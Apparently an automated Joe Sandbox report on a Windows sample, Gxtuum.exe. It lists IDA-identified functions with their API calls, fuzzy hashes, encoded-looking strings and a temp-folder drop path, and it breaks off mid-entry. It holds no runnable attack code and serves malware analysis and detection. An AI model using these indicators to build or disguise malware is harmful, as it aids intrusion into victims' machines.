Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Internet$CloseHandleOpen$FileReadSleep
String ID: 246122658369$2LE=$Ph
API String ID: 2890883735-3814100221
Opcode ID: 31525ed873d4b89be7504bc568c79be57931d2c5074bd2487037cd37459f8cb1
Instruction ID: d087af6c3b1e4f7ca8bd51ffb3e60cab13f8f3fa7ee6e20e806dcd9a1b74a3f9
Opcode Fuzzy Hash: 31525ed873d4b89be7504bc568c79be57931d2c5074bd2487037cd37459f8cb1
Instruction Fuzzy Hash: B1813971A0024CABEF18DF78CD4ABBD7F76AF85300F648118F545A76C2CBB58A849791

Function 001170A8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001170BE

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 001170CA
_free.LIBCMT ref: 001170D5
_free.LIBCMT ref: 001170E0
_free.LIBCMT ref: 001170EB
_free.LIBCMT ref: 001170F6
_free.LIBCMT ref: 00117101
_free.LIBCMT ref: 0011710C
_free.LIBCMT ref: 00117117
_free.LIBCMT ref: 00117125

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a6628158ddeb24f4a34ba61f7e9cedf93a88564bc8ffd72b5d8fefbc041f917a
Instruction ID: 7becc53ad281a994ba193c646e54b98d8ff7a8689fce5e7bef6e9aeeb4a69bb4
Opcode Fuzzy Hash: a6628158ddeb24f4a34ba61f7e9cedf93a88564bc8ffd72b5d8fefbc041f917a
Instruction Fuzzy Hash: DC219A76910208AFCB45EF94CD81DDEBBB9FF98340F0181A5F515AB121EB31EA84CB90

Function 000FC950 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 284COMMON

Download Yara Rule

Strings

dzRUatfzLr==, xrefs: 000FC9F8
246122658369, xrefs: 000FB5BB, 000FB61D, 000FB681, 000FC9B9, 000FCE91
2vE=, xrefs: 000FB5A1, 000FCE77

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: 246122658369$2vE=$dzRUatfzLr==
API String ID: 0-3489045377
Opcode ID: 8939edf6dd60a26f585e9aea47c8e5a989bc527283d78af199b007588af479db
Instruction ID: 955f24687400d454f4d7e6abec221d409847655b2dc6a26bb76e1a8d4690036e
Opcode Fuzzy Hash: 8939edf6dd60a26f585e9aea47c8e5a989bc527283d78af199b007588af479db
Instruction Fuzzy Hash: 16B1C170A0024CEFEF14DFA8C94ABEEBBB5EF45304F508158E941676C2D7B59A44CB92

Function 00121314 Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00121382
_free.LIBCMT ref: 0012138E
_free.LIBCMT ref: 001214B7
_free.LIBCMT ref: 001214C2

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 07b444fd61bf491979a4aaa03f82aa1b5f3caff0183169dd4cffee8fc72fc8d5
Instruction ID: 2571bb16390ccdc858a6142a25f53e43171d3637e9f892ffdb9a42ae2a3235f1
Opcode Fuzzy Hash: 07b444fd61bf491979a4aaa03f82aa1b5f3caff0183169dd4cffee8fc72fc8d5
Instruction Fuzzy Hash: DE610671900355BFDB24EF64D841FAAB7F9FF65720F104529E849EB281EB70AD808B50

Function 00109173 Relevance: 13.6, APIs: 9, Instructions: 139threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0010919B
GetCurrentThreadId.KERNEL32 ref: 001091B8
GetCurrentThreadId.KERNEL32 ref: 001091CD
_xtime_get.LIBCPMT ref: 00109253
GetCurrentThreadId.KERNEL32 ref: 0010927D
__Xtime_diff_to_millis2.LIBCPMT ref: 00109299
_xtime_get.LIBCPMT ref: 001092BC
GetCurrentThreadId.KERNEL32 ref: 001092C6
GetCurrentThreadId.KERNEL32 ref: 001092FD

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: 897eb11877fd43a912f490587694e36c4f9e490a2598b8a09484984ad79e4b6c
Instruction ID: 92da8a4f611b4c4ecaa8525b3e54c566a885e3823ee3bd729b81c90f3326f945
Opcode Fuzzy Hash: 897eb11877fd43a912f490587694e36c4f9e490a2598b8a09484984ad79e4b6c
Instruction Fuzzy Hash: C3517C75A00206EFCF10DF64C9A55A9B7F4FF09320B25855AE886AB6D6C7B0ED80CB50

Function 00102B60 Relevance: 12.3, APIs: 8, Instructions: 343COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00102C27
std::_Rethrow_future_exception.LIBCPMT ref: 00102C74
std::_Rethrow_future_exception.LIBCPMT ref: 00102C84
__Mtx_unlock.LIBCPMT ref: 00102D1B
__Mtx_unlock.LIBCPMT ref: 00102E14
__Mtx_unlock.LIBCPMT ref: 00102E62
__Cnd_broadcast.LIBCPMT ref: 00102EAC
__Mtx_unlock.LIBCPMT ref: 00102EB5

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
String ID:
API String ID: 3990724213-0
Opcode ID: f600073e60740b4d502991d4210bea5760dc5a104c0255e52aa7324968d4d27c
Instruction ID: 15195f0fa839e57e282ec7001ead58c21d86a89d1d07c54088959a2f769d770c
Opcode Fuzzy Hash: f600073e60740b4d502991d4210bea5760dc5a104c0255e52aa7324968d4d27c
Instruction Fuzzy Hash: 50B102B1D006099FDB24DF74C949BAEBBB4FF15300F00452EE896A76D2DBB1A944CB91

Function 000FACB0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 000EA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,455139FB,00000000,?), ref: 000EA4BA

GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00147494,0000000E,455139FB,?,00000000), ref: 000FAD5D

Strings

0s==, xrefs: 000FAFEB
246122658369, xrefs: 000FB5BB, 000FB61D, 000FB681, 000FC9B9
2Phf, xrefs: 000FAFB1
., xrefs: 000FB6B5
2LE=, xrefs: 000FB667

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AttributesFileFolderPath
String ID: .$0s==$246122658369$2LE=$2Phf
API String ID: 1512852658-2364514272
Opcode ID: f6766b12a34ea0c04cd4ec7c2446624bc1d9c337a9ee4703b19854d998dd8170
Instruction ID: 97526534340c8170a07bd0f87ca8b52e0286204c59b9eee55ae11da2d374b855
Opcode Fuzzy Hash: f6766b12a34ea0c04cd4ec7c2446624bc1d9c337a9ee4703b19854d998dd8170
Instruction Fuzzy Hash: 11E1907090428CDFEF14DBA8C9497DDBFB6AF51304F548188D4452B6C2C7B55A88DF92

Function 000F2260 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

list too long, xrefs: 000F26F9

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: list too long
API String ID: 0-1124181908
Opcode ID: c37170b868e2b02cf78c913bf54173dbafbe20f7e2554713133cf2c00377a751
Instruction ID: 62348883b0880ef16c30ee82e33ed9b416931b5443cfcccb52564900bb9cfeb2
Opcode Fuzzy Hash: c37170b868e2b02cf78c913bf54173dbafbe20f7e2554713133cf2c00377a751
Instruction Fuzzy Hash: 1151B1B4D047189BDB10DF64DD85B9AF7F4FF14310F0042A9E948AB691DB70AA81CF51

Function 0010CBE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0010CC17
___except_validate_context_record.LIBVCRUNTIME ref: 0010CC1F
_ValidateLocalCookies.LIBCMT ref: 0010CCA8
__IsNonwritableInCurrentImage.LIBCMT ref: 0010CCD3
_ValidateLocalCookies.LIBCMT ref: 0010CD28

Strings

csm, xrefs: 0010CCBD

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: fbc72e3a9ea89df8155d7299e7c7390450a901404e02e8b22e9f5ec3c57bdfda
Instruction ID: b8730794b83aed571cc29ed6be402cfceb68a295a8ed8995bef0c73447758634
Opcode Fuzzy Hash: fbc72e3a9ea89df8155d7299e7c7390450a901404e02e8b22e9f5ec3c57bdfda
Instruction Fuzzy Hash: 7941E434A002199BCF00EFA8C881A9EBBB5FF45324F148255E859AB3D2D7B1DA05CFD1

Function 00118A75 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00118ACC
ext-ms-, xrefs: 00118AE0

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 9db6299b8b20cf52443d471fd211fa46cf76ad2ed775ba2337e3202ac3291e25
Instruction ID: a82b5adcd954ad7f0e3dcdc57576528fec47ee88254e5a4d3444e57df6cc0b8c
Opcode Fuzzy Hash: 9db6299b8b20cf52443d471fd211fa46cf76ad2ed775ba2337e3202ac3291e25
Instruction Fuzzy Hash: F021E7B1A09211ABDB298B34AC85A9F37699F05760F254131FC16A72D1DF30EC80C6E4

Function 001217D6 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00121522: _free.LIBCMT ref: 00121547

_free.LIBCMT ref: 00121824

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 0012182F
_free.LIBCMT ref: 0012183A
_free.LIBCMT ref: 0012188E
_free.LIBCMT ref: 00121899
_free.LIBCMT ref: 001218A4
_free.LIBCMT ref: 001218AF

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
Instruction ID: af356fa42009798e60cc4f6803258244cbb6eabeeb505adb44c4226e39960f38
Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
Instruction Fuzzy Hash: 79117F32941B14BAD530FBB0DC47FCBB7DDAFA5700F804C24B29BA6052DB24F6554650

Function 00117B5F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00117BA7
__fassign.LIBCMT ref: 00117D8C
__fassign.LIBCMT ref: 00117DA9
WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00117DF1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00117E31
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00117ED9

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 9b390f039bdd075c69a70d7fbe8e738d705fbe0eed1c349908aeedff937d54ac
Instruction ID: f325c1b52732f2ade0ea2b56702e023a8ef2b94442e3b24a2b3cfda6e691a660
Opcode Fuzzy Hash: 9b390f039bdd075c69a70d7fbe8e738d705fbe0eed1c349908aeedff937d54ac
Instruction Fuzzy Hash: A6C18D75D092589FCB18CFE8D8809EDBBF5AF59304F2841AAE855B7381D7319D82CB60

Function 00109BC6 Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00109C0F
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00109C7A
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00109C97
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00109CD6
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00109D35
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00109D58

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 2d19d76c1e96b5343425ab2a197b7956ba44a7d40a10f8c95576c64f1c195c2c
Instruction ID: 670b2ea869d78fd9cae5cfe459dcde6eeaf1aaccf7e4917ae34e69433a2570eb
Opcode Fuzzy Hash: 2d19d76c1e96b5343425ab2a197b7956ba44a7d40a10f8c95576c64f1c195c2c
Instruction Fuzzy Hash: 3751AC7294020ABBEF208FA1DC55FAF7BA9EF44750F254129F951D61A2E7B1CD10CBA0

Function 00104B70 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00104BA5
std::_Lockit::_Lockit.LIBCPMT ref: 00104BC7
std::_Lockit::~_Lockit.LIBCPMT ref: 00104BE7
__Getctype.LIBCPMT ref: 00104C7D
std::_Facet_Register.LIBCPMT ref: 00104C9C
std::_Lockit::~_Lockit.LIBCPMT ref: 00104CB4

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: 31821e202b6d1a0574d60d39e559f950d68dff67b9094869e1bc6f02221b472d
Instruction ID: 6396b66ffb2b629aea17262d6c08dbbcf950cd70c82143d6483110cea3279714
Opcode Fuzzy Hash: 31821e202b6d1a0574d60d39e559f950d68dff67b9094869e1bc6f02221b472d
Instruction Fuzzy Hash: A141EFB0D052148FDB25DF54C980AAEB7F0EF65710F14816DE885AB291DBB0AE41CB80

Function 0010CDA4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,0012C21D,0010CD9B,0010B434,00108149,455139FB,?,?,?,00000000,0012CE07,000000FF,?,000E2576,?,?), ref: 0010CDB2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0010CDC0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0010CDD9
SetLastError.KERNEL32(00000000,?,00000000,0012CE07,000000FF,?,000E2576,?,?,0000000F,000E3BA5,00000000,0000000F,00000000,0012C7A0,000000FF), ref: 0010CE2B

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8bfc0ca93005bcc8b60cb990ef357cbed6c3832a0fc007eb86e3b9cca1f3a09c
Instruction ID: 62df7a1b25fd168e0736f5d8d9736ccd105d227204d4c8ae8e0343f5049f3dd0
Opcode Fuzzy Hash: 8bfc0ca93005bcc8b60cb990ef357cbed6c3832a0fc007eb86e3b9cca1f3a09c
Instruction Fuzzy Hash: 1C01F73A20C3226EE62827F4BC865572F44EB53B7A330033AF555854F2EFD14C82AAC1

Function 0011FA37 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, xrefs: 0011FA3C

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
API String ID: 0-1719652438
Opcode ID: f7cfd976577f0ee9c794300ede510794da5f9695e32397ad9907ea3da2624d60
Instruction ID: 0a16cb424732bf75f794bdc2573a76de82e68b4003b28ebe3485d2ac29d04f5d
Opcode Fuzzy Hash: f7cfd976577f0ee9c794300ede510794da5f9695e32397ad9907ea3da2624d60
Instruction Fuzzy Hash: 5821F271200206BF9B28AF64AC809EBB7ACEF10364725413CF96DCB190DB75DCC187A0

Function 0010DDF7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,0010DEB8,?,?,00000000,?,?,0010DF6A,00000002,FlsGetValue,001333D8,001333E0,?), ref: 0010DE87

Strings

api-ms-, xrefs: 0010DE47

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 1bacbfb87c9b143c057d81b260fb57016a62a71a35dc66335a6fafe5a734f1eb
Instruction ID: 7ff05bdb137b88191909e55fc68cf6957304ecba2a57e075cd835fa4d2e95e7c
Opcode Fuzzy Hash: 1bacbfb87c9b143c057d81b260fb57016a62a71a35dc66335a6fafe5a734f1eb
Instruction Fuzzy Hash: 3D11C631A41221BBDF224BB8EC45B5A7794AF25B70F260220FD51EF2C0D7B0ED4086D4

Function 0010E292 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0010E287,?,?,0010E24F,00000000,00000000,?), ref: 0010E2A7
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0010E2BA
FreeLibrary.KERNEL32(00000000,?,?,0010E287,?,?,0010E24F,00000000,00000000,?), ref: 0010E2DD

Strings

CorExitProcess, xrefs: 0010E2B2
mscoree.dll, xrefs: 0010E2A0

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 140cbcf31cddbefdfac5b30fa5cb9a4f63d4862c49c5a0a343b1d8ac611286b1
Instruction ID: b08d25d593ff054763ea55c32dbb6d13d30d2d156384adbc18996e1b9fffb184
Opcode Fuzzy Hash: 140cbcf31cddbefdfac5b30fa5cb9a4f63d4862c49c5a0a343b1d8ac611286b1
Instruction Fuzzy Hash: 9EF03031A44219FBDB11AB51ED0ABDEBEB9EF00756F104060F901E25A0CBB58F40DB95

Function 00115D60 Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001171C0: GetLastError.KERNEL32(00000000,00000000,?,00117FA7,?,00000000,00000000,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010), ref: 001171C5
Part of subcall function 001171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00118461,00000000,00000000,00000000,00000000,8B18EC83,00144218,00000010,00111502,00000000,00000000,00000000), ref: 00117263

_free.LIBCMT ref: 0011604B
_free.LIBCMT ref: 00116064
_free.LIBCMT ref: 001160A2
_free.LIBCMT ref: 001160AB
_free.LIBCMT ref: 001160B7

Memory Dump Source

Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

